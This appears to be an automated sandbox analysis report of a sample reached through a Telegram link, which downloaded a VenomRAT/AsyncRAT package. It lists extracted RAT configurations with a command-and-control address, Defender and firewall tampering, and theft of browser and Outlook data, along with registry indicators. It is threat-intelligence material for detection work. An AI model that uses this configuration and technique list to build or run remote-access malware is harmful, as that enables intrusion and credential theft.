Analysis
-
max time kernel
977s -
max time network
994s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
24-12-2024 02:20
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://t.me/RELabDiscussion/30886
Resource
win11-20241007-en
General
-
Target
https://t.me/RELabDiscussion/30886
Malware Config
Extracted
asyncrat
1.0.7
Default
95.216.52.21:7575
xdnqiaxygefjfoolgo
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
127.0.0.1:4449
gavhqcekvoufwwtkygf
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection powershell.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 436 created 688 436 powershell.exe 7 -
Async RAT payload 3 IoCs
resource yara_rule behavioral1/files/0x001900000002af94-1384.dat family_asyncrat behavioral1/files/0x001900000002af30-1385.dat family_asyncrat behavioral1/files/0x001900000002afa3-1410.dat family_asyncrat -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1628 netsh.exe 4508 netsh.exe -
Executes dropped EXE 7 IoCs
pid Process 1452 tsetup-x64.5.9.0.exe 2196 tsetup-x64.5.9.0.tmp 4744 Telegram.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 2752 rat.exe 1732 rat.exe 2804 Client.exe -
Loads dropped DLL 1 IoCs
pid Process 4744 Telegram.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rat.exe Key opened \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rat.exe Key opened \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rat.exe Key opened \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Client.exe Key opened \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Client.exe Key opened \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Client.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
pid Process 2420 powershell.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini Telegram.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 112 discord.com 126 discord.com 4 discord.com -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com 3 icanhazip.com 19 ip-api.com 20 icanhazip.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
pid Process 3224 ARP.EXE -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 756 tasklist.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1632 sc.exe 4392 sc.exe 1588 sc.exe 3528 sc.exe -
Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
description ioc Process File opened for modification C:\Users\Admin\Downloads\tsetup-x64.5.9.0.exe:Zone.Identifier msedge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tsetup-x64.5.9.0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tsetup-x64.5.9.0.tmp -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 1636 cmd.exe 4200 netsh.exe 2840 cmd.exe 1400 netsh.exe -
System Network Connections Discovery 1 TTPs 1 IoCs
Attempt to get a listing of network connections.
pid Process 2096 NETSTAT.EXE -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier rat.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Client.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Client.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 rat.exe -
Collects information from the system 1 TTPs 1 IoCs
Uses WMIC.exe to find detailed system information.
pid Process 4632 WMIC.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1372 timeout.exe -
Enumerates system info in registry 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ Telegram.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Telegram.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Telegram.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Telegram.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Telegram.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct Telegram.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 3112 ipconfig.exe 2096 NETSTAT.EXE -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 3392 systeminfo.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" Venom RAT + HVNC + Stealer + Grabber.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\tdesktop.tg\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" Telegram.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\tg\shell\open Telegram.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 00000000ffffffff Venom RAT + HVNC + Stealer + Grabber.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0\0 = 8000310000000000f656fa46100056454e4f4d527e312e33285f0000640009000400efbe9859fc129859fc122e0000000a500200000004000000000000000000000000000000805a0f00560065006e006f006d005200410054002000760036002e0030002e003300200028002b0053004f005500520043004500290000001c000000 Venom RAT + HVNC + Stealer + Grabber.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Venom RAT + HVNC + Stealer + Grabber.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Generic" Venom RAT + HVNC + Stealer + Grabber.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0000000001000000ffffffff Venom RAT + HVNC + Stealer + Grabber.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\tdesktop.tg\shell Telegram.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\tonsite\shell\open\command Telegram.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings Venom RAT + HVNC + Stealer + Grabber.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Venom RAT + HVNC + Stealer + Grabber.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" Venom RAT + HVNC + Stealer + Grabber.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" Venom RAT + HVNC + Stealer + Grabber.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\tdesktop.tg\shell\open\command Telegram.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\tg\shell\open\command Telegram.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\tdesktop.tonsite\DefaultIcon Telegram.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Venom RAT + HVNC + Stealer + Grabber.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} Venom RAT + HVNC + Stealer + Grabber.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" Venom RAT + HVNC + Stealer + Grabber.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" Venom RAT + HVNC + Stealer + Grabber.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\tdesktop.tonsite\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" Telegram.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\tonsite Telegram.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 Venom RAT + HVNC + Stealer + Grabber.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 Venom RAT + HVNC + Stealer + Grabber.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1" Venom RAT + HVNC + Stealer + Grabber.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\tg\DefaultIcon Telegram.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\tonsite\DefaultIcon Telegram.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 Venom RAT + HVNC + Stealer + Grabber.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0 Venom RAT + HVNC + Stealer + Grabber.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Venom RAT + HVNC + Stealer + Grabber.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\tg\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" Telegram.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\tdesktop.tonsite\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" Telegram.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell Venom RAT + HVNC + Stealer + Grabber.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Venom RAT + HVNC + Stealer + Grabber.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Venom RAT + HVNC + Stealer + Grabber.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" Venom RAT + HVNC + Stealer + Grabber.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" Venom RAT + HVNC + Stealer + Grabber.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\tdesktop.tg\DefaultIcon Telegram.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\tg\ = "URL:Telegram Link" Telegram.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\tg\shell Telegram.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell Venom RAT + HVNC + Stealer + Grabber.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 Venom RAT + HVNC + Stealer + Grabber.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0 = 84003100000000009859fc121100444f574e4c4f7e3100006c0009000400efbe4759005f9859fd122e000000345702000000010000000000000000004200000000004f247c0044006f0077006e006c006f00610064007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370039003800000018000000 Venom RAT + HVNC + Stealer + Grabber.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" Venom RAT + HVNC + Stealer + Grabber.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff Venom RAT + HVNC + Stealer + Grabber.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 19002f433a5c000000000000000000000000000000000000000000 Venom RAT + HVNC + Stealer + Grabber.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\MRUListEx = 00000000ffffffff Venom RAT + HVNC + Stealer + Grabber.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Venom RAT + HVNC + Stealer + Grabber.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" Venom RAT + HVNC + Stealer + Grabber.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\tg\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" Telegram.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\tdesktop.tonsite\shell\open\command Telegram.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\tonsite\ = "URL:TonSite Link" Telegram.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0 Venom RAT + HVNC + Stealer + Grabber.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0\0\0 Venom RAT + HVNC + Stealer + Grabber.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0\0\MRUListEx = 00000000ffffffff Venom RAT + HVNC + Stealer + Grabber.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Venom RAT + HVNC + Stealer + Grabber.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" Venom RAT + HVNC + Stealer + Grabber.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" Venom RAT + HVNC + Stealer + Grabber.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 Venom RAT + HVNC + Stealer + Grabber.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0 = 500031000000000047593a66100041646d696e003c0009000400efbe4759005f9859a4122e0000002c57020000000100000000000000000000000000000022660601410064006d0069006e00000014000000 Venom RAT + HVNC + Stealer + Grabber.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\MRUListEx = 00000000ffffffff Venom RAT + HVNC + Stealer + Grabber.exe -
NTFS ADS 3 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 575744.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\tsetup-x64.5.9.0.exe:Zone.Identifier msedge.exe File created C:\Users\Admin\Downloads\Telegram Desktop\VenomRAT v6.0.3 (+SOURCE).7z:Zone.Identifier Telegram.exe -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4744 Telegram.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
